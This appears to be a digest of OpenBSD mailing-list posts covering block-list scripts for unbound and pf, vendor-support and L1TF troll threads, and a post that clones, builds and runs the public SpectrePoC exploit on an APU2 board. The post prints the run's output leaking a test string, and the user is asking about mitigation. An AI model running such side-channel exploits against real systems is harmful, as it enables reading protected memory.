lobste.rs invite received

[Ken M]

Thank you

Ken

Lobste.rs

[Ken M]

Figuring there are a good amount of members on this list that are also on
Lobste.rs.

Anyway I was hoping to get an invite to create an account there if someone
could.

Thank you,
Ken

APU2 and Spectre

[Consus]

Hi,

Seems like APU2 board is vulnerable to Spectre:

$ uname -r
6.3
$ dmesg | grep cpu0 | grep AMD
cpu0: AMD GX-412TC SOC, 998.27 MHz
$ git clone https://github.com/crozone/SpectrePoC
$ cd SpectrePoC
$ gmake
$ ./spectre.out 85
Using a cache hit threshold of 85.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED 
INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED
Reading 40 bytes:
Reading at malicious_x = 0xffeff180... Success: 0x54=’T’ score=2
Reading at malicious_x = 0xffeff181... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffeff182... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff183... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff184... Success: 0x4D=’M’ score=2
Reading at malicious_x = 0xffeff185... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff186... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffeff187... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffeff188... Success: 0x63=’c’ score=2
Reading at malicious_x = 0xffeff189... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff18a... Success: 0x57=’W’ score=2
Reading at malicious_x = 0xffeff18b... Success: 0x6F=’o’ score=2
Reading at malicious_x = 0xffeff18c... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffeff18d... Success: 0x64=’d’ score=2
Reading at malicious_x = 0xffeff18e... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff18f... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff190... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff191... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffeff192... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff193... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff194... Success: 0x53=’S’ score=2
Reading at malicious_x = 0xffeff195... Success: 0x71=’q’ score=2
Reading at malicious_x = 0xffeff196... Success: 0x75=’u’ score=2
Reading at malicious_x = 0xffeff197... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff198... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff199... Success: 0x6D=’m’ score=2
Reading at malicious_x = 0xffeff19a... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffeff19b... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff19c... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffeff19d... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff19e... Success: 0x4F=’O’ score=2
Reading at malicious_x = 0xffeff19f... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff1a0... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff1a1... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffeff1a2... Success: 0x66=’f’ score=2
Reading at malicious_x = 0xffeff1a3... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffeff1a4... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff1a5... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffeff1a6... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff1a7... Success: 0x2E=’.’ score=2

I've double-checked output of syspatch(1) and fw_update(1) but no
pending updates exist. Am I missing something or there is no mitigation
for this AMD CPU family?

Re: Atom CPU is clear of L1TF

[Benjamin Baier]

On Sat, 25 Aug 2018 07:10:14 +
Rupert Gallagher  wrote:

> While Intel Core and Xeon are affected by L1TF, Atom CPUs (c3000) are clear 
> of it. Applying the patch to Cores and Xeons basically turns those CPUs into 
> Atoms. It is a shame that the self-appointed "most secure OS" does not run on 
> such processors.

What? Atom X works well, why wouldn't it run on C3000?
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Atom(TM) x7-Z8750 CPU @ 1.60GHz, 1600.36 MHz

> Your faithful troll.
I see.

Re: SuperMicro A2SDi-4C-HLN4F

[Rupert Gallagher]

 wrote:

> This vendor addresses hardware & firmware faults like the other enterprise 
> vendors, they DON'T past year two. BIOS and BMC firmwares are not updated 
> after this even with the long term lifetime products, you are on your own!

On bios and ipmi updates, you can download and apply them yourself. For 
advanced bios updates, there is a licence you can purchase, as you do with Dell 
and HP.

On warranty, they are in line with the industry standards:

https://www.supermicro.com/support/Warranty/

On open source, they work with the community, well enough to have a cetified 
list of compatible systems:

https://www.supermicro.com/support/faqs/os.cfm

When you are in business, you do not want to go back to the drawing board each 
time. You need a platform where to build your own services. If you have to 
develop disk and keyboard drivers, and you are told off from the support 
mailing list, then the OS is worth nothing to you. OpenBSD is not ready for 
enterprise.

Your faithfull troll.

Re: Addblock + Badhost blocking via unbound(8) and pf anchors

[jin]

Thanks Jordan, i will look at those links.

On Sat, 25 Aug 2018, 10:31 Jordan Geoghegan,  wrote:

> You may want to check out the more recent guides I wrote for the updated
> version of these scripts:
>
> www.geoghegan.ca/unbound-adblock.html
>
> www.geoghegan.ca/pfbadhost.html
>
>
> On 08/24/18 06:32, jin wrote:
> > Hello
> >
> > Thanks for sharing all those informations. I've been looking a way to
> > create a blacklist and you sent this mail just on time. Your web page
> > help me a lot.
> > On the OpenBSD your script do all jobs but on linux based systems I
> > wrote a shell script for update iptables rules.
> >
> >
> http://analog-radyo.blogspot.com/2018/08/dynamic-block-list-on-linux-iptables.html
> >
> >
> > Jordan Geoghegan  > >, 30 Ara 2017 Cmt, 01:52 tarihinde
> > şunu yazdı:
> >
> > Hi everyone,
> >
> > Due to the number of people who have requested my add-blocking
> > scripts,
> > I figured I would also post them to @misc so anyone can easily enjoy
> > network-wide bad-host/add-blocking.
> >
> > I won't go into detail on how to set up routing/dhcp/unbound/anchors
> > etc, for that see: https://www.openbsd.org/faq/pf/example1.html
> >
> > I've included some example files from my an Edgerouter I have set
> > up .
> > They are trimmed down for brevities sake; the conf files are not
> > production ready, these are merely examples.
> >
> > This setup is easily customizable, if you come across any other block
> > lists you prefer, then they can be dropped in no problem. I chose
> > to use
> > solely the StevenBlack hosts file because it is a master list
> > compiled
> > from all the major banlists found in popular blocking products
> > such as
> > uBlock Origin, Addblock Plus et al. I also chose this file because
> > it is
> > filtered for duplicates as unbound(8) is said to struggle when
> > there are
> > redundancies in the blocklists, I'm told -- though I've never had
> > any issue.
> >
> > You're going to have to read the scripts and create the
> > directories the
> > scripts are calling and edit the anchor macros to fit your interface
> > layout (I doubt everyone here is running cnmac0 as egress) and
> > also will
> > have to make the scripts executable and set them to run at regular
> > intervals with crontab, ideally nightly.
> >
> > I didn't make these scripts intelligent because I figured it was
> > simpler
> > to just run mkdir once rather than add extra lines to the script.
> >
> > I know the pf.conf is fairly long, I thought I would show an
> > example of
> > my prio and queing setup as an example, or conversely to see if
> > anyone
> > can poke any holes in it.
> >
> > All the relevant bits regarding the anchors and blocklists are
> > found at
> > the end of the pf.conf file. See below that for the anchor conf files
> > we're calling as well.
> >
> > Hope this helps,
> >
> > Jordan Geoghegan
> >
> >
> > First, the scripts:
> >
> > *DNS addblock script:*
> >
> > StevenBlack.sh:
> >
> > cd /var/unbound/etc/banlist && \
> > ftp
> > https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts &&
> \
> > cat hosts | grep '^0\.0\.0\.0' | awk '{print "local-zone: \""$2"\"
> > redirect\nlocal-data: \""$2" A 0.0.0.0\""}' > ads.conf
> > rcctl reload unbound
> >
> > ###
> >
> > *IP based malicious IP blocking:*
> >
> > banlist.sh:
> >
> > cd /etc/blocklist && ftp https://www.binarydefense.com/banlist.txt\
> > &&  ftp
> > https://rules.emergingthreats.net/blockrules/compromised-ips.txt\
> > &&
> > <
> https://rules.emergingthreats.net/blockrules/compromised-ips.txt%5C&;>
> > ftp
> https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt\
> > &&
> > <
> https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt%5C&;>
> > ftp
> >
> https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level3.netset\
> > &&
> > <
> https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level3.netset%5C&;
> >
> > pfctl -a banlist -f /etc/banlist.conf
> >
> > ###
> >
> > As you can see, we are going to have to make an anchor in pf called
> > 'banlist' and modify the unbound.conf to load our banlist 'ads.conf'
> >
> > If that's all you need, then you're pretty much good to go. If you
> > would
> > like to see my example conf files, see below.
> >
> > *
> >
> >
> > Example unbound.conf:*
> >
> > # $OpenBSD: unbound.conf,v 1.7 2016/03/30 01:41:25 sthen Exp $
> >
> > server:
> > interface: 172.17.17.1
> > interface: 127.0.0.1
> > access-control: 172.17.17.0/24  allow
> > access-control: 172.17.0.0/24 

Re: Addblock + Badhost blocking via unbound(8) and pf anchors

[Jordan Geoghegan]

You may want to check out the more recent guides I wrote for the updated 
version of these scripts:


www.geoghegan.ca/unbound-adblock.html

www.geoghegan.ca/pfbadhost.html


On 08/24/18 06:32, jin wrote:

Hello

Thanks for sharing all those informations. I've been looking a way to 
create a blacklist and you sent this mail just on time. Your web page 
help me a lot.
On the OpenBSD your script do all jobs but on linux based systems I 
wrote a shell script for update iptables rules.


http://analog-radyo.blogspot.com/2018/08/dynamic-block-list-on-linux-iptables.html


Jordan Geoghegan >, 30 Ara 2017 Cmt, 01:52 tarihinde 
şunu yazdı:


Hi everyone,

Due to the number of people who have requested my add-blocking
scripts,
I figured I would also post them to @misc so anyone can easily enjoy
network-wide bad-host/add-blocking.

I won't go into detail on how to set up routing/dhcp/unbound/anchors
etc, for that see: https://www.openbsd.org/faq/pf/example1.html

I've included some example files from my an Edgerouter I have set
up .
They are trimmed down for brevities sake; the conf files are not
production ready, these are merely examples.

This setup is easily customizable, if you come across any other block
lists you prefer, then they can be dropped in no problem. I chose
to use
solely the StevenBlack hosts file because it is a master list
compiled
from all the major banlists found in popular blocking products
such as
uBlock Origin, Addblock Plus et al. I also chose this file because
it is
filtered for duplicates as unbound(8) is said to struggle when
there are
redundancies in the blocklists, I'm told -- though I've never had
any issue.

You're going to have to read the scripts and create the
directories the
scripts are calling and edit the anchor macros to fit your interface
layout (I doubt everyone here is running cnmac0 as egress) and
also will
have to make the scripts executable and set them to run at regular
intervals with crontab, ideally nightly.

I didn't make these scripts intelligent because I figured it was
simpler
to just run mkdir once rather than add extra lines to the script.

I know the pf.conf is fairly long, I thought I would show an
example of
my prio and queing setup as an example, or conversely to see if
anyone
can poke any holes in it.

All the relevant bits regarding the anchors and blocklists are
found at
the end of the pf.conf file. See below that for the anchor conf files
we're calling as well.

Hope this helps,

Jordan Geoghegan


First, the scripts:

*DNS addblock script:*

StevenBlack.sh:

cd /var/unbound/etc/banlist && \
ftp
https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts && \
cat hosts | grep '^0\.0\.0\.0' | awk '{print "local-zone: \""$2"\"
redirect\nlocal-data: \""$2" A 0.0.0.0\""}' > ads.conf
rcctl reload unbound

###

*IP based malicious IP blocking:*

banlist.sh:

cd /etc/blocklist && ftp https://www.binarydefense.com/banlist.txt\
&&  ftp
https://rules.emergingthreats.net/blockrules/compromised-ips.txt\
&&

ftp https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt\
&&

ftp

https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level3.netset\
&&


pfctl -a banlist -f /etc/banlist.conf

###

As you can see, we are going to have to make an anchor in pf called
'banlist' and modify the unbound.conf to load our banlist 'ads.conf'

If that's all you need, then you're pretty much good to go. If you
would
like to see my example conf files, see below.

*


Example unbound.conf:*

# $OpenBSD: unbound.conf,v 1.7 2016/03/30 01:41:25 sthen Exp $

server:
        interface: 172.17.17.1
        interface: 127.0.0.1
        access-control: 172.17.17.0/24  allow
        access-control: 172.17.0.0/24  allow
        do-not-query-localhost: no
        hide-identity: yes
        hide-version: yes
        include: /var/unbound/etc/banlist/ads.conf

forward-zone:
        name: "."
        forward-addr: UR.DNS.GO.HERE
        forward-addr: UR.DNS.GO.HERE

###


*Example pf.conf:*

#       $OpenBSD: pf.conf,v 1.54 2014/08/23 05:49:42 deraadt Exp $
#
# See pf.conf(5) and /etc/examples/pf.conf

# By default, do not permit remote connections to X11
block return in on ! lo0 proto tcp to port 6000:6010
#

Atom CPU is clear of L1TF

[Rupert Gallagher]

While Intel Core and Xeon are affected by L1TF, Atom CPUs (c3000) are clear of 
it. Applying the patch to Cores and Xeons basically turns those CPUs into 
Atoms. It is a shame that the self-appointed "most secure OS" does not run on 
such processors.

Your faithful troll.